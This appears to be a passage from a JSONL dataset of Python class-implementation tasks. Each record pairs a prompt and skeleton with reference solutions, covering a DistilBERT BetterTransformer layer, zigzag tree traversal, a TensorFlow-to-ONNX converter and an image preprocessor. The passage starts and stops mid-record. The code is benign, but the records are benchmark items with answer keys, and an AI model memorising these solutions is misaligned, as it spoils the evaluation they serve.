torch._nested_tensor_from_mask(x, attn_mask)\n attn_mask = None\n x = torch._transformer_encoder_layer_fwd(x, self.embed_dim, self.num_heads, self.in_proj_weight, self.in_proj_bias, self.out_proj_weight, self.out_proj_bias, self.use_gelu, self.norm_first, self.norm1_eps, self.norm1_weight, self.norm1_bias, self.norm2_weight, self.norm2_bias, self.linear1_weight, self.linear1_bias, self.linear2_weight, self.linear2_bias, attn_mask)\n if x.is_nested and self.is_last_layer:\n x = x.to_padded_tensor(0.0)\n return (x,)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000327", "length_bytes": 43670, "license_type": "no_license", "methods": [{"docstring": "A simple conversion of the Distill-BERTLayer to its `BetterTransformer` implementation. Args: bert_layer (`torch.nn.Module`): The original Distill-BERT Layer where the weights needs to be retrieved.", "name": "__init__", "signature": "def __init__(self, bert_layer, config)"}, {"docstring": "This is just a wrapper around the forward function proposed in: https://github.com/huggingface/transformers/pull/19553", "name": "forward", "signature": "def forward(self, x, attn_mask, head_mask=None, output_attentions=None, *_)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006256", "prompt": "Implement the Python class `DistilBertLayerBetterTransformer` described below.\n\nClass description:\nImplement the DistilBertLayerBetterTransformer class.\n\nMethod signatures and docstrings:\n- def __init__(self, bert_layer, config): A simple conversion of the Distill-BERTLayer to its `BetterTransformer` implementation. Args: bert_layer (`torch.nn.Module`): The original Distill-BERT Layer where the weights needs to be retrieved.\n- def forward(self, x, attn_mask, head_mask=None, output_attentions=None, *_): This is just a wrapper around the forward function proposed in: https://github.com/huggingface/transformers/pull/19553", "prompted_full_text": "Implement the Python class `DistilBertLayerBetterTransformer` described below.\n\nClass description:\nImplement the DistilBertLayerBetterTransformer class.\n\nMethod signatures and docstrings:\n- def __init__(self, bert_layer, config): A simple conversion of the Distill-BERTLayer to its `BetterTransformer` implementation. Args: bert_layer (`torch.nn.Module`): The original Distill-BERT Layer where the weights needs to be retrieved.\n- def forward(self, x, attn_mask, head_mask=None, output_attentions=None, *_): This is just a wrapper around the forward function proposed in: https://github.com/huggingface/transformers/pull/19553\n\n<|skeleton|>\nclass DistilBertLayerBetterTransformer:\n\n def __init__(self, bert_layer, config):\n \"\"\"A simple conversion of the Distill-BERTLayer to its `BetterTransformer` implementation. Args: bert_layer (`torch.nn.Module`): The original Distill-BERT Layer where the weights needs to be retrieved.\"\"\"\n <|body_0|>\n\n def forward(self, x, attn_mask, head_mask=None, output_attentions=None, *_):\n \"\"\"This is just a wrapper around the forward function proposed in: https://github.com/huggingface/transformers/pull/19553\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(config)\n self.in_proj_weight = nn.Parameter(torch.cat([bert_layer.attention.q_lin.weight, bert_layer.attention.k_lin.weight, bert_layer.attention.v_lin.weight]))\n self.in_proj_bias = nn.Parameter(torch.cat([bert_layer.attention.q_lin.bias, bert_layer.attention.k_lin.bias, bert_layer.attention.v_lin.bias]))\n self.out_proj_weight = bert_layer.attention.out_lin.weight\n self.out_proj_bias = bert_layer.attention.out_lin.bias\n self.linear1_weight = bert_layer.ffn.lin1.weight\n self.linear1_bias = bert_layer.ffn.lin1.bias\n self.linear2_weight = bert_layer.ffn.lin2.weight\n self.linear2_bias = bert_layer.ffn.lin2.bias\n self.norm1_eps = bert_layer.sa_layer_norm.eps\n self.norm1_weight = bert_layer.sa_layer_norm.weight\n self.norm1_bias = bert_layer.sa_layer_norm.bias\n self.norm2_eps = bert_layer.output_layer_norm.eps\n self.norm2_weight = bert_layer.output_layer_norm.weight\n self.norm2_bias = bert_layer.output_layer_norm.bias\n self.num_heads = bert_layer.attention.n_heads\n self.embed_dim = bert_layer.attention.dim\n self.is_last_layer = False\n self.validate_bettertransformer()\n<|end_body_0|>\n\n<|body_start_1|>\n super().forward_checker()\n if x.is_nested:\n attn_mask = None\n if attn_mask is not None:\n attn_mask = attn_mask.bool()\n attn_mask = torch.reshape(attn_mask, (attn_mask.shape[0], attn_mask.shape[-1]))\n seqlen = attn_mask.shape[1]\n lengths = torch.sum(~attn_mask, 1)\n if not all([l == seqlen for l in lengths]):\n x = torch._nested_tensor_from_mask(x, attn_mask)\n attn_mask = None\n x = torch._transformer_encoder_layer_fwd(x, self.embed_dim, self.num_heads, self.in_proj_weight, self.in_proj_bias, self.out_proj_weight, self.out_proj_bias, self.use_gelu, self.norm_first, self.norm1_eps, self.norm1_weight, self.norm1_bias, self.norm2_weight, self.norm2_bias, self.linear1_weight, self.linear1_bias, self.linear2_weight, self.linear2_bias, attn_mask)\n if x.is_nested and self.is_last_layer:\n x = x.to_padded_tensor(0.0)\n return (x,)\n<|end_body_1|>\n", "revision_id": "7e55a422588c1d1e00f35a3d3a3ff896cce59e18", "skeleton": "<|skeleton|>\nclass DistilBertLayerBetterTransformer:\n\n def __init__(self, bert_layer, config):\n \"\"\"A simple conversion of the Distill-BERTLayer to its `BetterTransformer` implementation. Args: bert_layer (`torch.nn.Module`): The original Distill-BERT Layer where the weights needs to be retrieved.\"\"\"\n <|body_0|>\n\n def forward(self, x, attn_mask, head_mask=None, output_attentions=None, *_):\n \"\"\"This is just a wrapper around the forward function proposed in: https://github.com/huggingface/transformers/pull/19553\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DistilBertLayerBetterTransformer:\n def __init__(self, bert_layer, config):\n \"\"\"A simple conversion of the Distill-BERTLayer to its `BetterTransformer` implementation. Args: bert_layer (`torch.nn.Module`): The original Distill-BERT Layer where the weights needs to be retrieved.\"\"\"\n super().__init__(config)\n self.in_proj_weight = nn.Parameter(torch.cat([bert_layer.attention.q_lin.weight, bert_layer.attention.k_lin.weight, bert_layer.attention.v_lin.weight]))\n self.in_proj_bias = nn.Parameter(torch.cat([bert_layer.attention.q_lin.bias, bert_layer.attention.k_lin.bias, bert_layer.attention.v_lin.bias]))\n self.out_proj_weight = bert_layer.attention.out_lin.weight\n self.out_proj_bias = bert_layer.attention.out_lin.bias\n self.linear1_weight = bert_layer.ffn.lin1.weight\n self.linear1_bias = bert_layer.ffn.lin1.bias\n self.linear2_weight = bert_layer.ffn.lin2.weight\n self.linear2_bias = bert_layer.ffn.lin2.bias\n self.norm1_eps = bert_layer.sa_layer_norm.eps\n self.norm1_weight = bert_layer.sa_layer_norm.weight\n self.norm1_bias = bert_layer.sa_layer_norm.bias\n self.norm2_eps = bert_layer.output_layer_norm.eps\n self.norm2_weight = bert_layer.output_layer_norm.weight\n self.norm2_bias = bert_layer.output_layer_norm.bias\n self.num_heads = bert_layer.attention.n_heads\n self.embed_dim = bert_layer.attention.dim\n self.is_last_layer = False\n self.validate_bettertransformer()\n\n def forward(self, x, attn_mask, head_mask=None, output_attentions=None, *_):\n \"\"\"This is just a wrapper around the forward function proposed in: https://github.com/huggingface/transformers/pull/19553\"\"\"\n super().forward_checker()\n if x.is_nested:\n attn_mask = None\n if attn_mask is not None:\n attn_mask = attn_mask.bool()\n attn_mask = torch.reshape(attn_mask, (attn_mask.shape[0], attn_mask.shape[-1]))\n seqlen = attn_mask.shape[1]\n lengths = torch.sum(~attn_mask, 1)\n if not all([l == seqlen for l in lengths]):\n x = torch._nested_tensor_from_mask(x, attn_mask)\n attn_mask = None\n x = torch._transformer_encoder_layer_fwd(x, self.embed_dim, self.num_heads, self.in_proj_weight, self.in_proj_bias, self.out_proj_weight, self.out_proj_bias, self.use_gelu, self.norm_first, self.norm1_eps, self.norm1_weight, self.norm1_bias, self.norm2_weight, self.norm2_bias, self.linear1_weight, self.linear1_bias, self.linear2_weight, self.linear2_bias, attn_mask)\n if x.is_nested and self.is_last_layer:\n x = x.to_padded_tensor(0.0)\n return (x,)\n", "source": "the_stack_v2_python_sparse", "source_path": "generated/test_huggingface_optimum.py", "source_repo": "jansel/pytorch-jit-paritybench", "split": "test", "star_events_count": 35} {"blob_id": "0accb919720c716fd15bafaf23c6a1cd96e3316b", "bodies": ["from collections import deque\nif root is None:\n return []\nq = deque([root])\nlevel = 0\nresult = []\nwhile q:\n sz = len(q)\n result.append([])\n for _ in range(sz):\n node = q.popleft()\n result[-1].append(node.val)\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n if level % 2 != 0:\n result[-1] = result[-1][::-1]\n level += 1\nreturn result", "from collections import deque\nif root is None:\n return []\nq = deque([root])\nlevel = 0\nresult = []\nwhile q:\n sz = len(q)\n result.append([0] * sz)\n for i in range(sz):\n node = q.popleft()\n if level % 2 == 0:\n idx = i\n else:\n idx = sz - i - 1\n result[-1][idx] = node.val\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n level += 1\nreturn result"], "bodies_text": "<|body_start_0|>\n from collections import deque\n if root is None:\n return []\n q = deque([root])\n level = 0\n result = []\n while q:\n sz = len(q)\n result.append([])\n for _ in range(sz):\n node = q.popleft()\n result[-1].append(node.val)\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n if level % 2 != 0:\n result[-1] = result[-1][::-1]\n level += 1\n return result\n<|end_body_0|>\n\n<|body_start_1|>\n from collections import deque\n if root is None:\n return []\n q = deque([root])\n level = 0\n result = []\n while q:\n sz = len(q)\n result.append([0] * sz)\n for i in range(sz):\n node = q.popleft()\n if level % 2 == 0:\n idx = i\n else:\n idx = sz - i - 1\n result[-1][idx] = node.val\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n level += 1\n return result\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:\n \"\"\"BFS with Reverse, Time: O(n), Space: O(n)\"\"\"\n <|body_0|>\n\n def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:\n \"\"\"BFS without Reverse, Time: O(n), Space: O(n)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n from collections import deque\n if root is None:\n return []\n q = deque([root])\n level = 0\n result = []\n while q:\n sz = len(q)\n result.append([])\n for _ in range(sz):\n node = q.popleft()\n result[-1].append(node.val)\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n if level % 2 != 0:\n result[-1] = result[-1][::-1]\n level += 1\n return result\n<|end_body_0|>\n\n<|body_start_1|>\n from collections import deque\n if root is None:\n return []\n q = deque([root])\n level = 0\n result = []\n while q:\n sz = len(q)\n result.append([0] * sz)\n for i in range(sz):\n node = q.popleft()\n if level % 2 == 0:\n idx = i\n else:\n idx = sz - i - 1\n result[-1][idx] = node.val\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n level += 1\n return result\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000328", "length_bytes": 1527, "license_type": "no_license", "methods": [{"docstring": "BFS with Reverse, Time: O(n), Space: O(n)", "name": "zigzagLevelOrder", "signature": "def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]"}, {"docstring": "BFS without Reverse, Time: O(n), Space: O(n)", "name": "zigzagLevelOrder", "signature": "def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]: BFS with Reverse, Time: O(n), Space: O(n)\n- def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]: BFS without Reverse, Time: O(n), Space: O(n)", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]: BFS with Reverse, Time: O(n), Space: O(n)\n- def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]: BFS without Reverse, Time: O(n), Space: O(n)\n\n<|skeleton|>\nclass Solution:\n\n def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:\n \"\"\"BFS with Reverse, Time: O(n), Space: O(n)\"\"\"\n <|body_0|>\n\n def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:\n \"\"\"BFS without Reverse, Time: O(n), Space: O(n)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n from collections import deque\n if root is None:\n return []\n q = deque([root])\n level = 0\n result = []\n while q:\n sz = len(q)\n result.append([])\n for _ in range(sz):\n node = q.popleft()\n result[-1].append(node.val)\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n if level % 2 != 0:\n result[-1] = result[-1][::-1]\n level += 1\n return result\n<|end_body_0|>\n\n<|body_start_1|>\n from collections import deque\n if root is None:\n return []\n q = deque([root])\n level = 0\n result = []\n while q:\n sz = len(q)\n result.append([0] * sz)\n for i in range(sz):\n node = q.popleft()\n if level % 2 == 0:\n idx = i\n else:\n idx = sz - i - 1\n result[-1][idx] = node.val\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n level += 1\n return result\n<|end_body_1|>\n", "revision_id": "72136e3487d239f5b37e2d6393e034262a6bf599", "skeleton": "<|skeleton|>\nclass Solution:\n\n def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:\n \"\"\"BFS with Reverse, Time: O(n), Space: O(n)\"\"\"\n <|body_0|>\n\n def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:\n \"\"\"BFS without Reverse, Time: O(n), Space: O(n)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:\n \"\"\"BFS with Reverse, Time: O(n), Space: O(n)\"\"\"\n from collections import deque\n if root is None:\n return []\n q = deque([root])\n level = 0\n result = []\n while q:\n sz = len(q)\n result.append([])\n for _ in range(sz):\n node = q.popleft()\n result[-1].append(node.val)\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n if level % 2 != 0:\n result[-1] = result[-1][::-1]\n level += 1\n return result\n\n def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:\n \"\"\"BFS without Reverse, Time: O(n), Space: O(n)\"\"\"\n from collections import deque\n if root is None:\n return []\n q = deque([root])\n level = 0\n result = []\n while q:\n sz = len(q)\n result.append([0] * sz)\n for i in range(sz):\n node = q.popleft()\n if level % 2 == 0:\n idx = i\n else:\n idx = sz - i - 1\n result[-1][idx] = node.val\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n level += 1\n return result\n", "source": "the_stack_v2_python_sparse", "source_path": "python/103-Binary Tree Zigzag Level Order Traversal.py", "source_repo": "cwza/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "e87a8683d4300f34018575e8d42abaf0fb780b5c", "bodies": ["self._graph = graph\nself.opset = util.default(opset, 11)\nself.optimize = util.default(optimize, True)", "(graph, output_names), _ = util.invoke_if_callable(self._graph)\ninput_names = list(tf_util.get_input_metadata(graph).keys())\ngraphdef = graph.as_graph_def()\nif self.optimize:\n graphdef = tf2onnx.tfonnx.tf_optimize(input_names, output_names, graph.as_graph_def())\nwith tf.Graph().as_default() as graph, tf.compat.v1.Session(graph=graph) as sess:\n tf.import_graph_def(graphdef, name='')\n onnx_graph = tf2onnx.tfonnx.process_tf_graph(graph, input_names=input_names, output_names=output_names, opset=self.opset)\n if self.optimize:\n onnx_graph = tf2onnx.optimizer.optimize_graph(onnx_graph)\n return onnx_graph.make_model('model')"], "bodies_text": "<|body_start_0|>\n self._graph = graph\n self.opset = util.default(opset, 11)\n self.optimize = util.default(optimize, True)\n<|end_body_0|>\n\n<|body_start_1|>\n (graph, output_names), _ = util.invoke_if_callable(self._graph)\n input_names = list(tf_util.get_input_metadata(graph).keys())\n graphdef = graph.as_graph_def()\n if self.optimize:\n graphdef = tf2onnx.tfonnx.tf_optimize(input_names, output_names, graph.as_graph_def())\n with tf.Graph().as_default() as graph, tf.compat.v1.Session(graph=graph) as sess:\n tf.import_graph_def(graphdef, name='')\n onnx_graph = tf2onnx.tfonnx.process_tf_graph(graph, input_names=input_names, output_names=output_names, opset=self.opset)\n if self.optimize:\n onnx_graph = tf2onnx.optimizer.optimize_graph(onnx_graph)\n return onnx_graph.make_model('model')\n<|end_body_1|>\n", "class_docstring": "Functor that loads a TensorFlow graph and converts it to ONNX using the tf2onnx converter.", "class_name": "OnnxFromTfGraph", "detected_licenses": ["Apache-2.0", "BSD-3-Clause", "MIT", "ISC", "BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass OnnxFromTfGraph:\n \"\"\"Functor that loads a TensorFlow graph and converts it to ONNX using the tf2onnx converter.\"\"\"\n\n def __init__(self, graph, opset=None, optimize=None):\n \"\"\"Converts a TensorFlow model into ONNX. Args: graph (Union[Tuple[tf.Graph, Sequence[str]], Callable() -> Tuple[tf.Graph, Sequence[str]]]): A tuple containing a TensorFlow graph and output names or a callable that returns one. opset (int): The ONNX opset to use during conversion. optimize (bool): Whether to use tf2onnx's graph optimization pass.\"\"\"\n <|body_0|>\n\n def call_impl(self):\n \"\"\"Returns: onnx.ModelProto: The ONNX model.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._graph = graph\n self.opset = util.default(opset, 11)\n self.optimize = util.default(optimize, True)\n<|end_body_0|>\n\n<|body_start_1|>\n (graph, output_names), _ = util.invoke_if_callable(self._graph)\n input_names = list(tf_util.get_input_metadata(graph).keys())\n graphdef = graph.as_graph_def()\n if self.optimize:\n graphdef = tf2onnx.tfonnx.tf_optimize(input_names, output_names, graph.as_graph_def())\n with tf.Graph().as_default() as graph, tf.compat.v1.Session(graph=graph) as sess:\n tf.import_graph_def(graphdef, name='')\n onnx_graph = tf2onnx.tfonnx.process_tf_graph(graph, input_names=input_names, output_names=output_names, opset=self.opset)\n if self.optimize:\n onnx_graph = tf2onnx.optimizer.optimize_graph(onnx_graph)\n return onnx_graph.make_model('model')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000329", "length_bytes": 37448, "license_type": "permissive", "methods": [{"docstring": "Converts a TensorFlow model into ONNX. Args: graph (Union[Tuple[tf.Graph, Sequence[str]], Callable() -> Tuple[tf.Graph, Sequence[str]]]): A tuple containing a TensorFlow graph and output names or a callable that returns one. opset (int): The ONNX opset to use during conversion. optimize (bool): Whether to use tf2onnx's graph optimization pass.", "name": "__init__", "signature": "def __init__(self, graph, opset=None, optimize=None)"}, {"docstring": "Returns: onnx.ModelProto: The ONNX model.", "name": "call_impl", "signature": "def call_impl(self)"}], "n_methods": 2, "prompt": "Implement the Python class `OnnxFromTfGraph` described below.\n\nClass description:\nFunctor that loads a TensorFlow graph and converts it to ONNX using the tf2onnx converter.\n\nMethod signatures and docstrings:\n- def __init__(self, graph, opset=None, optimize=None): Converts a TensorFlow model into ONNX. Args: graph (Union[Tuple[tf.Graph, Sequence[str]], Callable() -> Tuple[tf.Graph, Sequence[str]]]): A tuple containing a TensorFlow graph and output names or a callable that returns one. opset (int): The ONNX opset to use during conversion. optimize (bool): Whether to use tf2onnx's graph optimization pass.\n- def call_impl(self): Returns: onnx.ModelProto: The ONNX model.", "prompted_full_text": "Implement the Python class `OnnxFromTfGraph` described below.\n\nClass description:\nFunctor that loads a TensorFlow graph and converts it to ONNX using the tf2onnx converter.\n\nMethod signatures and docstrings:\n- def __init__(self, graph, opset=None, optimize=None): Converts a TensorFlow model into ONNX. Args: graph (Union[Tuple[tf.Graph, Sequence[str]], Callable() -> Tuple[tf.Graph, Sequence[str]]]): A tuple containing a TensorFlow graph and output names or a callable that returns one. opset (int): The ONNX opset to use during conversion. optimize (bool): Whether to use tf2onnx's graph optimization pass.\n- def call_impl(self): Returns: onnx.ModelProto: The ONNX model.\n\n<|skeleton|>\nclass OnnxFromTfGraph:\n \"\"\"Functor that loads a TensorFlow graph and converts it to ONNX using the tf2onnx converter.\"\"\"\n\n def __init__(self, graph, opset=None, optimize=None):\n \"\"\"Converts a TensorFlow model into ONNX. Args: graph (Union[Tuple[tf.Graph, Sequence[str]], Callable() -> Tuple[tf.Graph, Sequence[str]]]): A tuple containing a TensorFlow graph and output names or a callable that returns one. opset (int): The ONNX opset to use during conversion. optimize (bool): Whether to use tf2onnx's graph optimization pass.\"\"\"\n <|body_0|>\n\n def call_impl(self):\n \"\"\"Returns: onnx.ModelProto: The ONNX model.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._graph = graph\n self.opset = util.default(opset, 11)\n self.optimize = util.default(optimize, True)\n<|end_body_0|>\n\n<|body_start_1|>\n (graph, output_names), _ = util.invoke_if_callable(self._graph)\n input_names = list(tf_util.get_input_metadata(graph).keys())\n graphdef = graph.as_graph_def()\n if self.optimize:\n graphdef = tf2onnx.tfonnx.tf_optimize(input_names, output_names, graph.as_graph_def())\n with tf.Graph().as_default() as graph, tf.compat.v1.Session(graph=graph) as sess:\n tf.import_graph_def(graphdef, name='')\n onnx_graph = tf2onnx.tfonnx.process_tf_graph(graph, input_names=input_names, output_names=output_names, opset=self.opset)\n if self.optimize:\n onnx_graph = tf2onnx.optimizer.optimize_graph(onnx_graph)\n return onnx_graph.make_model('model')\n<|end_body_1|>\n", "revision_id": "a167852705d74bcc619d8fad0af4b9e4d84472fc", "skeleton": "<|skeleton|>\nclass OnnxFromTfGraph:\n \"\"\"Functor that loads a TensorFlow graph and converts it to ONNX using the tf2onnx converter.\"\"\"\n\n def __init__(self, graph, opset=None, optimize=None):\n \"\"\"Converts a TensorFlow model into ONNX. Args: graph (Union[Tuple[tf.Graph, Sequence[str]], Callable() -> Tuple[tf.Graph, Sequence[str]]]): A tuple containing a TensorFlow graph and output names or a callable that returns one. opset (int): The ONNX opset to use during conversion. optimize (bool): Whether to use tf2onnx's graph optimization pass.\"\"\"\n <|body_0|>\n\n def call_impl(self):\n \"\"\"Returns: onnx.ModelProto: The ONNX model.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class OnnxFromTfGraph:\n \"\"\"Functor that loads a TensorFlow graph and converts it to ONNX using the tf2onnx converter.\"\"\"\n\n def __init__(self, graph, opset=None, optimize=None):\n \"\"\"Converts a TensorFlow model into ONNX. Args: graph (Union[Tuple[tf.Graph, Sequence[str]], Callable() -> Tuple[tf.Graph, Sequence[str]]]): A tuple containing a TensorFlow graph and output names or a callable that returns one. opset (int): The ONNX opset to use during conversion. optimize (bool): Whether to use tf2onnx's graph optimization pass.\"\"\"\n self._graph = graph\n self.opset = util.default(opset, 11)\n self.optimize = util.default(optimize, True)\n\n def call_impl(self):\n \"\"\"Returns: onnx.ModelProto: The ONNX model.\"\"\"\n (graph, output_names), _ = util.invoke_if_callable(self._graph)\n input_names = list(tf_util.get_input_metadata(graph).keys())\n graphdef = graph.as_graph_def()\n if self.optimize:\n graphdef = tf2onnx.tfonnx.tf_optimize(input_names, output_names, graph.as_graph_def())\n with tf.Graph().as_default() as graph, tf.compat.v1.Session(graph=graph) as sess:\n tf.import_graph_def(graphdef, name='')\n onnx_graph = tf2onnx.tfonnx.process_tf_graph(graph, input_names=input_names, output_names=output_names, opset=self.opset)\n if self.optimize:\n onnx_graph = tf2onnx.optimizer.optimize_graph(onnx_graph)\n return onnx_graph.make_model('model')\n", "source": "the_stack_v2_python_sparse", "source_path": "tools/Polygraphy/polygraphy/backend/onnx/loader.py", "source_repo": "NVIDIA/TensorRT", "split": "test", "star_events_count": 8026} {"blob_id": "59781d4fd0cbfba2d8c0719ea0ffab2033269ac7", "bodies": ["self.scale = scale\nself.bias = bias\nself.rgb = rgb", "if image.shape[0] != requiredHeight or image.shape[1] != requiredWidth:\n image = cv2.resize(image, (requiredWidth, requiredHeight))\nif self.rgb:\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\nimage = image.astype(np.float32)\nif self.scale is not None:\n image *= self.scale\nif self.bias is not None:\n image += self.bias\nreturn image"], "bodies_text": "<|body_start_0|>\n self.scale = scale\n self.bias = bias\n self.rgb = rgb\n<|end_body_0|>\n\n<|body_start_1|>\n if image.shape[0] != requiredHeight or image.shape[1] != requiredWidth:\n image = cv2.resize(image, (requiredWidth, requiredHeight))\n if self.rgb:\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = image.astype(np.float32)\n if self.scale is not None:\n image *= self.scale\n if self.bias is not None:\n image += self.bias\n return image\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Preprocessor", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Preprocessor:\n\n def __init__(self, scale=None, bias=None, rgb=None):\n \"\"\"Create a preprocessing object to handle image transformations required for network to run scale : float Scale factor applied to image after conversion to float bias : 3-element np.array Bias applied to image after scaling rgb : bool Set to true to convert 3 channel data to RGB (from BGR)\"\"\"\n <|body_0|>\n\n def __call__(self, image, requiredWidth, requiredHeight):\n \"\"\"Run the required preprocessing steps on an input image image : np.ndarray containing the image data\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.scale = scale\n self.bias = bias\n self.rgb = rgb\n<|end_body_0|>\n\n<|body_start_1|>\n if image.shape[0] != requiredHeight or image.shape[1] != requiredWidth:\n image = cv2.resize(image, (requiredWidth, requiredHeight))\n if self.rgb:\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = image.astype(np.float32)\n if self.scale is not None:\n image *= self.scale\n if self.bias is not None:\n image += self.bias\n return image\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000330", "length_bytes": 5320, "license_type": "permissive", "methods": [{"docstring": "Create a preprocessing object to handle image transformations required for network to run scale : float Scale factor applied to image after conversion to float bias : 3-element np.array Bias applied to image after scaling rgb : bool Set to true to convert 3 channel data to RGB (from BGR)", "name": "__init__", "signature": "def __init__(self, scale=None, bias=None, rgb=None)"}, {"docstring": "Run the required preprocessing steps on an input image image : np.ndarray containing the image data", "name": "__call__", "signature": "def __call__(self, image, requiredWidth, requiredHeight)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007218", "prompt": "Implement the Python class `Preprocessor` described below.\n\nClass description:\nImplement the Preprocessor class.\n\nMethod signatures and docstrings:\n- def __init__(self, scale=None, bias=None, rgb=None): Create a preprocessing object to handle image transformations required for network to run scale : float Scale factor applied to image after conversion to float bias : 3-element np.array Bias applied to image after scaling rgb : bool Set to true to convert 3 channel data to RGB (from BGR)\n- def __call__(self, image, requiredWidth, requiredHeight): Run the required preprocessing steps on an input image image : np.ndarray containing the image data", "prompted_full_text": "Implement the Python class `Preprocessor` described below.\n\nClass description:\nImplement the Preprocessor class.\n\nMethod signatures and docstrings:\n- def __init__(self, scale=None, bias=None, rgb=None): Create a preprocessing object to handle image transformations required for network to run scale : float Scale factor applied to image after conversion to float bias : 3-element np.array Bias applied to image after scaling rgb : bool Set to true to convert 3 channel data to RGB (from BGR)\n- def __call__(self, image, requiredWidth, requiredHeight): Run the required preprocessing steps on an input image image : np.ndarray containing the image data\n\n<|skeleton|>\nclass Preprocessor:\n\n def __init__(self, scale=None, bias=None, rgb=None):\n \"\"\"Create a preprocessing object to handle image transformations required for network to run scale : float Scale factor applied to image after conversion to float bias : 3-element np.array Bias applied to image after scaling rgb : bool Set to true to convert 3 channel data to RGB (from BGR)\"\"\"\n <|body_0|>\n\n def __call__(self, image, requiredWidth, requiredHeight):\n \"\"\"Run the required preprocessing steps on an input image image : np.ndarray containing the image data\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.scale = scale\n self.bias = bias\n self.rgb = rgb\n<|end_body_0|>\n\n<|body_start_1|>\n if image.shape[0] != requiredHeight or image.shape[1] != requiredWidth:\n image = cv2.resize(image, (requiredWidth, requiredHeight))\n if self.rgb:\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = image.astype(np.float32)\n if self.scale is not None:\n image *= self.scale\n if self.bias is not None:\n image += self.bias\n return image\n<|end_body_1|>\n", "revision_id": "1510ecbbb6b4a43b9f1f9503c87ec66216200677", "skeleton": "<|skeleton|>\nclass Preprocessor:\n\n def __init__(self, scale=None, bias=None, rgb=None):\n \"\"\"Create a preprocessing object to handle image transformations required for network to run scale : float Scale factor applied to image after conversion to float bias : 3-element np.array Bias applied to image after scaling rgb : bool Set to true to convert 3 channel data to RGB (from BGR)\"\"\"\n <|body_0|>\n\n def __call__(self, image, requiredWidth, requiredHeight):\n \"\"\"Run the required preprocessing steps on an input image image : np.ndarray containing the image data\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Preprocessor:\n def __init__(self, scale=None, bias=None, rgb=None):\n \"\"\"Create a preprocessing object to handle image transformations required for network to run scale : float Scale factor applied to image after conversion to float bias : 3-element np.array Bias applied to image after scaling rgb : bool Set to true to convert 3 channel data to RGB (from BGR)\"\"\"\n self.scale = scale\n self.bias = bias\n self.rgb = rgb\n\n def __call__(self, image, requiredWidth, requiredHeight):\n \"\"\"Run the required preprocessing steps on an input image image : np.ndarray containing the image data\"\"\"\n if image.shape[0] != requiredHeight or image.shape[1] != requiredWidth:\n image = cv2.resize(image, (requiredWidth, requiredHeight))\n if self.rgb:\n image = cv2.cvtColor(image, 